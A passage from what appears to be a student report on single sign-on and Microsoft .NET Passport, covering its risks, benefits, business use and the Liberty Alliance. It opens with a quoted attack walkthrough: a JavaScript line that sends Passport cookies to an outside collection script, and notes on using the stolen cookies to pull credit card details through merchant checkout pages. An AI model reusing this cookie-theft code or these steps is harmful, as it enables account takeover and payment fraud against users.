document.location="http://alive.znep.com/~marcs/passport/snarf.cgi?cookies=" + escape(parent.frames[0].document.cookie);}The only trick is that alreadysignedin.srf ends up being loaded as a non-SSL page, which is no good since we can't access the SSL upper frame to grab the SSL-only MSPSec cookie, due to the scripting security model. So that's no problem, we just reload the same page using SSL, at which point our code executes again, and sends the cookies from the upper frame off to a CGI script that just captures them to a log. Part Four: So we have the cookies...Congratulations, you have successfully stolen some cookies. You can then automate the rest of the stealing of the Passport Wallet however you want. The easy way for demonstrations is to just copy the cookies into a Netscape cookies file, and go from there. The easiest way to actually get the full credit card numbers, etc. is to go to a Passport Express Purchase enabled store, go through the checkout, and then many or most stores will show you all the information as part of the order page. I'm sure you can figure out the other ways to automate it or grab it without actually involving any merchant's site. Hint: the information is sent to the browser as part of a form that automatically posts back to the merchant site using ECML.
27
7. Advantages of PassportAlthough as we all see, the passport has so many risks, why we still like to use it?Because we are simple users, because it benefit us!
Ease of use. Users can log in once and get authenticated access to all servers for which that user is authorized, without being interrupted by repeated requests for passwords. It reduces the number of passwords users must remember to one. This means it is extremely unlikely the user will forget their password. Since all passwords are the same the user has less chance of forgetting their password.
Password limited to local machine. To log in, the user types a single password that protects the private-key database on the local machine. Passwords are not sent over the network.
Simplified Management. Administrators can control who is allowed access to which servers by controlling the lists of certificate authorities maintained by client and server software. These lists are shorter than lists of user names and passwords and don't change as often.
28
8. Business use (MS Passport)
8.1 Business use of Passport
Single sign-in. it allows users to create a single set of credentials that can be used to access any site that supports a Passport service, which increase customer satisfaction by allowing website visitors easy access without the frustration of repetitive registrations and forgotten passwords.Kids Passport. The Kids Passport services offer tools to help businesses comply with the parental consent provisions of certain children's privacy laws such as those in the U.S. Children's Online Privacy Protection Act (COPPA). Parents can use the Kids Passport service to modify their children's Passport profile information and choose a consent level to which participating Kids Passport sites collect, use, and share children's personal information.*
8.2 Business Benefits of Passport
Passport offers several business benefits.Save Time and Money Required to Build Authentication SystemsPassport reduces the need to build, host, and maintain authentication systems, enabling your company to focus development resources on value-added features that will drive your business. Passport also offers localization in more than 25 languages, which may further decrease your total costs. In addition, fewer forgotten passwords can reduce your customer support expenses.Offer 200 Million Passport Users Easy Access to Your SitePassport simplifies sign-in and registration, lowering barriers for 200 million Passport account holders to access your website. Providing users easy access without the burden of repetitive registrations and forgotten passwords can help increase customer reach and satisfaction.Increase Customer Loyalty with Easy, Dependable PersonalizationPassport lets you personalize the Web experience of returning customers based on their unique profiles. By offering personalized customization, you can build closer, more meaningful relationships with your customers, and increase customer loyalty.Maintain Your Branding with Flexible CustomizationWith Passport, you can tailor sign-in pages to match your site design, providing a seamless experience for your customers.Maintain Ownership and Control of Your Customer DataPassport does not have access or visibility to any of your data. Passport is simply a technology that helps you enable authenticated, user-centric services for your customers. The relationship between your company and your customers belongs solely to you.
29
9. About the Liberty Alliance“The Liberty Alliance Project is an alliance of more than 150 companies, non-profit and government organizations from around the globe. The consortium is committed to developing an open standard for federated network identity that supports all current and emerging network devices. Federated identity offers businesses, governments, employees and consumers a more convenient and secure way to control identity information in today are digital economy, and is a key component in driving the use of e-commerce, personalized data services, as well as web-based services. Membership is open to all commercial and non-commercial organizations.” xviii
Liberty Alliance and Passport are both primarily targeted at consumers and it will be awhile before there will be significant web services use by consumers. Different from the Passport, the Liberty neither definite a center certificate system, nor suggesting the users in cooperating domains to move to the center certificate system. A one to many or many to many alliance relation could be constituted between certificate system and cooperating domain, as the same as between certificate systems.
The Liberty Alliance is pushing forward with its vision for an open-system single sign-on, which are officials described as a federated-view solution. It plans to have personal information controlled completely by the user, yet able to be securely shared with the organizations of the users choosing, thus preventing any attacks, and erecting toll booths or impediments to interoperability or service delivery.
Liberty version 1.0 is a very flexible certificate system criterion which buildup by Web Redirection, Web Services, Metadata and Schemas. Theoretically, the organizations in Alliance could extend boundless. But since the organizing mode is a bit disengaged, it will bring the
iReference
? www.cafesoft.com/support/security/glossary.htmlii http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci340859,00.htmliii http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci340859,00.htmliv “Comparing Password Synchronization with Protocom SecureLogin® Single Sign-on” white
paper by Protocom Development Systems October 1, 2004 http://www.bitpipe.com/detail/RES/1098809756_442.html?src=googlev http://java.sun.com/features/2002/05/single-signon.htmlvi www.zeroonesoftware.com/glossary.htmlvii http://www.oasis-open.org/committees/security/viii Execute overview documentation, http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=securityix Execute overview documentation, http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=securityx Execute overview documentation, http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=securityxii Microsoft .NET Passport Review Guide Microsoft Jan. 2004xiii Telling Humans and Computers Apart Automatically Luis von Ahn Feb. 2004xv Microsoft .NET Passport Review Guide Microsoft Jan. 2004xvi XADM: How Secure Sockets Layer Works Microsoft.com Nov. 2004xvii Passport white paperxviii http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci340859,00.html?I http://www.projectliberty.org/about/index.php
30
problems about the flexibility of the system and the management of the certification. The efficiency of the certification still needs to be test through the spread of this alliance.
31
10. ConclusionPassword management can be a complex and frustrating task for end users, resulting in compromised security and lost productivity. Single Sign-On enables users to login quickly and securely to all their applications, websites and mainframe sessions with just one identity. It solves your password management problems by eliminating the need for users to remember the myriad of usernames and passwords beyond their initial network login.
From all of single sign-on system we focus mainly on the NET. Passport, as it is more popular and common one nowadays. Most of us have the MSN Accounts. But not all of us know how it works directly, that is also the main reason we choose this topic. Although the passport has security weaknesses, such as Cookies problem, Key management, Passport Server attack and Hotmail credential assignment, and it could easily be attacked if we pay less attention to protect it, it still be used widely. The benefits of Passport are also obvious, as I show above, both for single user and business.
Liberty Alliance aims at corporations rather than individuals, in contrast with Ms Passport. We look forward to the cooperation and competition between Liberty Alliance and Microsoft may promote the progress of single Sign in System.
32
Bibliography [1] Microsoft .NET Passport Review Guide Microsoft.com Jan. 2004[2] Telling Humans and Computer Apart Automatically Luis von Ahn Feb. 2004[3] CAPTCHA: Using Hard AI Problems for Security Luis von Ahn[4]XADM: How Secure Sockets Layer Works Microsoft.com Nov. 2004[5]SSL(Secure Sockets Layer) http://www.nwfusion.com/details/473.html?def[6]Risk of the Passport Single Signon Protocol AT&T Labs David and Aviel
xi Microsoft .NET Passport Review Guide Microsoft Jan. 2004 xiv Microsoft .NET Passport Review Guide Microsoft Jan. 2004
33